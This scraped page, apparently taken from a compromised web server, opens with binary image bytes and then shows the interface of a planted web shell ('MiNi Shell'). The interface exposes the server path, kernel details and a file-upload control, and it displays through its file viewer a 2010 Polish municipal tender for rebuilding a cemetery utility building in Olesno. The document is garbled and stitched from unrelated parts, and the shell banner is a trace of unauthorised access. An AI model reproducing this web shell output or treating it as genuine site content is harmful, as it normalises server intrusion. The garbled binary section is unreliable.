JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100311/54523-N-2010.html

<p class="kh_header"><b>Olesno: Przebudowa budynku gospodarczego na terenie cmentarza komunalnego                     w Oleśnie wraz ze zmianą sposobu użytkowania oraz budowa przyłącza kanalizacyjnego</b><br>
<b>Numer ogłoszenia: 54523 - 2010; data zamieszczenia: 11.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olesna , ul. Pieloka 21, 46-300 Olesno, woj. opolskie, tel. 034 3597841-44 w. 204, faks 034 3597283.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olesno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku gospodarczego na terenie cmentarza komunalnego                     w Oleśnie wraz ze zmianą sposobu użytkowania oraz budowa przyłącza kanalizacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Przedmiotem zamówienia publicznego będą roboty budowlane polegające na: Przebudowie budynku gospodarczego na terenie cmentarza komunalnego w Oleśnie wraz ze zmianą sposobu użytkowania oraz budowie przyłącza kanalizacyjnego. Roboty budowlane w obrębie budynku będą obejmować pracez zakresu branży ogólnobudowlanej, w tym prace rozbiórkowe, branży elektrycznej oraz sanitarnej. W wyniku robót budowlanych zostaną wykonane: nowy układ funkcjonalny oraz zmiany w zakresie konstrukcji i wykończenia budynku. Przebudowa ma na celu: polepszyć warunki sanitarne w toaletach publicznych oraz warunki funkcjonowania biura cmentarnego, wymianę elementów budynku nie spełniających swojej funkcji na nowe, odnowę budynku i poprawę estetyki obiektu wpisując jego bryłę w charakter cmentarza, a także zmniejszyć uciążliwość obiektu dla środowiska. Przebudowa nie zmienia bryły budynku.
Branża ogólnobudowlana obejmuje wykonanie m.in. następujących prac: całkowita rozbiórka konstrukcji i poszycia dachu, wykonanie nowego dachu (konstrukcja krokwiowa analogiczna z obecną), wykonanie nowej elewacji budynku, docieplenie budynku na zewnątrz, rozbiórka niektórych ścian działowych, wykonanie nowych ścian działowych, roboty murarskie - zamurowania otworów i inne, skucie tynków zewnętrznych i wewnętrznych, wykonanie nowych tynków, w tym okładzin z tynku mozaikowego, wykonanie sufitów podwieszanych z płyty gipsowo- kartonowej, malowanie ścian i sufitów farbami silikatowymi, wykonanie na ścianach okładzin z płytek ceramicznych, izolacja podłóg styropianem, wyłożenie podłóg płytkami ceramicznymi, montaż poręczy i uchwytów w pomieszczeniach dla osób niepełnosprawnych, adaptacja komina na pion wentylacyjny, montaż stolarki okiennej i drzwiowej oraz inne.
Branża elektryczna obejmuje m.in.: demontaż istniejącego zasilania napowietrznego, wykonanie zasilania z istniejącego budynku gosp., zabudowę tablicy bezpiecznikowej - obudowa dwurzędowa modułowa, wykonanie instalacji oświetlenia ogólnego oraz awaryjnego, instalacja gniazd wtykowych jednofazowych, hermetycznych, ogólnego przeznaczenia, łączników oświetleniowych, instalacja zasilania wentylatorów wywiewnych, grzejników elektrycznych, kurtyny powietrznej, elektrycznego ogrzewacza wody, montaż opraw oświetleniowych, instalacja urządzeń ochrony przeciwporażeniowe i przeciwprzepięciowej oraz inne.
Branża sanitarna obejmuje m.in.: wykonanie instalacji wody zimnej (od istniejącego węzła wodomierzowego w budynku gosp. do podejść pod armaturę czerpalną) i ciepłej (indywidualny podgrzewacz pojemnościowy), uzupełnionej armaturą kulową mufową, wykonanie instalacji kanalizacji sanitarnej, w tym budowa przyłącza kanalizacyjnego (roboty mechaniczne), na pionach kanalizacyjnych napowietrzniki, rury wywiewne i czyszczaki z pokrywami, kanalizacja wewnętrzna pod posadzką budynku, wykonanie instalacji grzewczej z grzejników elektrycznych, wykonanie wentylacji mechanicznej wywiewnej.

3.2 Stan istniejący. Obecnie budynek gospodarczy służy funkcjonowaniu cmentarza komunalnego - znajduje się w nim biuro cmentarne i pomieszczenia dla administratora cmentarza oraz toalety publiczne suche (damskie i męskie) dla odwiedzających cmentarz. Działka cmentarza zabudowana dwoma budynkami parterowymi. Budynek gospodarczy jednobryłowy na planie prostokąta, niepodpiwniczony, przykryty dachem jednospadowym. Budynek wyposażony w instalację elektryczną oświetleniową i zasilającą, przyłącze zimnej wody użytkowej, ogrzewany piecem (tzw. kozą). Budynek nie posiada instalacji C.O., C.W.U., wentylacyjnej, gazowej, kanalizacji sanitarnej.
Działka jest ogrodzona i posiada dojazd z drogi publicznej. Na działce istnieją alejki dla komunikacji pieszej, wyłożone kostką betonową. Na działce znajduje się zieleń wysoka.
Nie zostały zaprojektowane zmiany w zagospodarowaniu działki na poziomie terenu (ciągi komunikacyjne, zabudowa naziemna, zieleń).
Szczegółowy opis przedmiotu zamówienia określają dokumentacja projektowa, wytyczne wykonawcze z przedmiarami robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych. Dokumenty te są załącznikami do specyfikacji istotnych warunków zamówienia i są dostępne na stronie internetowej Zamawiającego. 
Zamawiający nie zapewnia dostaw materiałów i urządzeń niezbędnych do realizacji robót budowlanych. W przypadku, gdy w dokumentacji projektowej opisano materiały lub urządzenia za pomocą podania nazwy ich producenta, patentów lub pochodzenia, to w odniesieniu do tych materiałów lub urządzeń Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych równoważnych materiałów lub urządzeń o odpowiednich paramentach i właściwościach użytkowych, jeżeli wyroby te zostały wprowadzone do obrotu zgodnie z przepisami odrębnymi - w tym przypadku Zamawiający może w toku realizacji zamówienia zażądać potwierdzenia w formie właściwych zaświadczeń, atestów czy certyfikatów, że oferowane dostawy i roboty budowlane odpowiadają określonym w dokumentacji wymaganiom.

3.3 Lokalizacja inwestycji: Budynek gospodarczy na cmentarzu komunalnym w Oleśnie, 46-300 Olesno, ul. Powstańców Śląskich, działka nr 3726/247, obręb ul. Pieloka, miasto Olesno. 

3.4 Warunki realizacji:
1.	Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone osobom trzecim, powstałe na skutek niewykonania lub nienależytego wykonania obowiązków.
2.	Wykonawca ponosi pełną odpowiedzialność za szkody wyrządzone Zamawiającemu, powstałe na skutek niewykonania lub nienależytego wykonania zobowiązania. 
3.	Wykonawca zobowiązuje się wykonać przedmiot zamówienia z należytą starannością, terminowo oraz fachowo, winien okazywać troskę i dbałość o powierzone mienie.
4.	Za przestrzeganie przepisów bhp, p.poż. przy wykonywaniu prac odpowiedzialnym jest Wykonawca.
5.	Zamawiający nie udostępni Wykonawcy żadnych pomieszczeń gospodarczych dla pracowników wykonujących prace remontowe oraz dla sprzętu budowlanego. 
6.	Wykonawca ubezpieczy się od odpowiedzialności cywilnej w zakresie wykonywanych robót objętych przedmiotem przetargu. 
7.	Komplet materiałów do wykonania zamówienia Wykonawca dostarczy we własnym zakresie.
8.	Wszystkie materiały i urządzenia użyte do wykonania zamówienia muszą posiadać aktualne świadectwa, aprobaty lub certyfikaty dopuszczające do stosowania w budownictwie na terenie RP. 
9.	Odpowiednie atesty, certyfikaty i aprobaty techniczne dotyczące zastosowania materiałów i urządzeń Wykonawca przedłoży Zamawiającemu na jego żądanie.
10.	Roboty wykonane będą zgodnie z dokumentacją techniczno- projektową, w tym Szczegółową Specyfikacją Techniczną Wykonania i Odbioru Robót, Przedmiarem Robót oraz Wytycznymi Wykonawczymi.

3.5 Warunki odbioru:
1.	Przedmiotem odbioru końcowego jest przedmiot umowy.
2.	Po faktycznym zakończeniu robót, Wykonawca powiadomi niezwłocznie, jednak nie później niż w ciągu 3 dni od zakończenia robót, Zamawiającego oraz w porozumieniu z Nim wyznaczy datę odbioru końcowego robót przypadającą nie później niż termin końcowy realizacji zamówienia wskazany przez Zamawiającego w ogłoszeniu o zamówieniu i specyfikacji istotnych warunków zamówienia.
3.	Za datę zakończenia robót przyjmuje się datę powiadomienia Zamawiającego przez Wykonawcę o gotowości do odbioru końcowego, o ile roboty zostaną odebrane. 
4.	Zamawiający dokona odbioru końcowego robót w terminie oznaczonym zgodnie z pkt. 2 i sporządzi niezwłocznie protokół z przyjęcia robót.
5.	Ostateczne rozliczenie między stronami nastąpi na podstawie faktury końcowej, wystawionej przez Wykonawcę w terminie 5 dni od daty odbioru końcowego.
6.	Strony postanawiają, że z czynności odbioru końcowego, jak i odbiorów częściowych, będzie spisany protokół zdawczo - odbiorczy, zawierający wszelkie ustalenia dokonane w toku odbioru, jak też terminy wyznaczone na usunięcie stwierdzonych przy odbiorze wad.
7.	Strony ustalają następujące postanowienia szczegółowe w sprawie procedury odbioru końcowego: odbiór przeprowadzony zostanie na podstawie ustalonego z Zamawiającym trybu roboczego po uprzednim przedłożeniu protokołów odbiorów częściowych, zaktualizowanej dokumentacji powykonawczej, atestów dotyczących materiałów i urządzeń.  
8.	Jeżeli w toku czynności odbiorowych zostaną stwierdzone wady, stosuje się właściwe postanowienia umowy.
9.	Zamawiający dopuszcza możliwość odbioru częściowego wykonanych robót na podstawie protokołu zdawczo - odbiorczego, na żądanie Wykonawcy zgłoszone w ciągu 2 dni od faktycznego zakończenia części robót, po sprawdzeniu przez Zamawiającego prawidłowości wykonanej części robót. Wówczas wynagrodzenie płatne będzie  na podstawie faktur częściowych, obejmujących wykonaną i odebraną część robót budowlanych, wystawionych w terminie 3 dni od daty odbioru częściowego. Zapłata na podstawie faktur częściowych płatna będzie w terminie 14 dni od chwili dostarczenia faktury VAT wraz z kompletem dokumentów odbiorowych do Urzędu Miejskiego w Oleśnie.

UWAGA !!! Z zakresu niniejszego zamówienia podlegają wyłączeniu wymienione niżej roboty budowlane w pomieszczeniach nr 2 (biuro), 3 (pomieszczenie socjalne) i 7 (pomieszczenie gospodarcze) uwzględnione w dokumentacji techniczno-projektowej:
1) roboty wykończeniowe posadzek,
2) ułożenie płytek na ścianach,
3) tynkowanie i malowanie ścian,
4) montaż armatury sanitarnej,
5) wykonanie stolarki drzwiowej z pomieszczenia nr 2 do pomieszczenia nr 3 (1x 90/200),
6) montaż opraw oświetleniowych, gniazd i włączników,
7) wykonanie sufitów podwieszanych.
Powyższe oznacza, iż zakres materiałów i nakład robocizny niezbędnych do wykonania tych prac ulega odpowiednio zmniejszeniu.
Prace te zostaną wykonane przez zarządcę cmentarza bądź będą przedmiotem II etapu zamówienia publicznego. 
Wykonawca zobowiązany jest do wykonania w pomieszczeniach nr 2 (biuro), 3 (pomieszczenie socjalne) i 7 (pomieszczenie gospodarcze) wyłącznie wymienionych niżej robót budowlanych:
1) wykonanie instalacji elektrycznej (rozprowadzenie z montażem puszek instalacyjnych),
2) wykonanie instalacji sanitarnej wodnej i kanalizacyjnej do miejsca przyłączenia armatury,
3) wykonanie instalacji wentylacyjnej w pełnym zakresie zgodnie z projektem budowlanym.

Wykonawca zobowiązany jest do przeprowadzenia własnym kosztem i staraniem wizji lokalnej w miejscu planowanych robót, dokonania własnych obmiarów oraz ich weryfikacji z przedmiarami robót Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie prawo udzielenia zamówień uzupełniających dotychczasowemu wykonawcy robót budowlanych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Dotyczy to sytuacji, gdy w toku realizacji inwestycji ze względu na przeznaczenie i charakter przedmiotu zamówienia okaże się, że należy zwiększyć zakres ilościowy prac przewidzianych w dokumentacji techniczno - projektowej, czego nie można było przewidzieć na etapie planowania inwestycji. W tym przypadku zamówienie zostanie udzielone w trybie z wolnej ręki po negocjacjach z dotychczasowym wykonawcą.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.30.00.00-0, 45.45.00.00-6, 45.33.23.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> (nie dotyczy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia
- 	warunek spełnią wykonawcy, którzy wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty w zakresie budowy lub przebudowy budynku  w wysokości przynajmniej 75 % wartości kosztorysu ofertowego brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia
- 	warunek spełnią wykonawcy, którzy przedstawią wykaz osób uczestniczących w realizacji postępowania w tym zatrudnienie kierowników robót, będących członkiem właściwej Izby Samorządu Zawodowego, posiadającego uprawnienia do kierowania robotami budowlanymi w specjalności:
- konstrukcyjno-budowlanej;
- instalacyjnej w zakresie instalacji i urządzeń elektrycznych;
- instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o zasadę: spełnia / nie spełnia
- 	warunek spełnią wykonawcy, którzy przedstawią opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy
Oświadczenie potwierdzające spełnianie warunków zawartych w art. 22 ust 1 ustawy.
Kosztorys ofertowy wykonawcy (Zamawiający dopuszcza możliwość złożenia kosztorysu w wersji uproszczonej).
Pełnomocnictwo (jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość istotnych zmian niniejszej umowy. Wszelkie istotne zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Zmiany mogą dotyczyć:
-	terminu wykonania robót w przypadku wystąpienia okoliczności nieprzewidzialnych w dniu udzielenia zamówienia,
-	zmiany wynagrodzenia w przypadku zmiany  w  przepisach o podatkach,
-	zmiany osób występujących po stornie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych z tym że osoby występujące po stornie Wykonawcy muszą spełniać warunki udziału w postępowania,
-	Zmiany umowy mogą dotyczyć jedynie kwestii, których nie można było przewidzieć (dochowując należytej staranności) w chwili zawarcia umowy i nie powinny wykraczać poza opis przedmiotu zamówienia określony w SIWZ oraz dokumentacji techniczno -projektowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://olesno.biuletyn.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2010 godzina 11:30, miejsce: Siedziba Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> (nie dotyczy).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com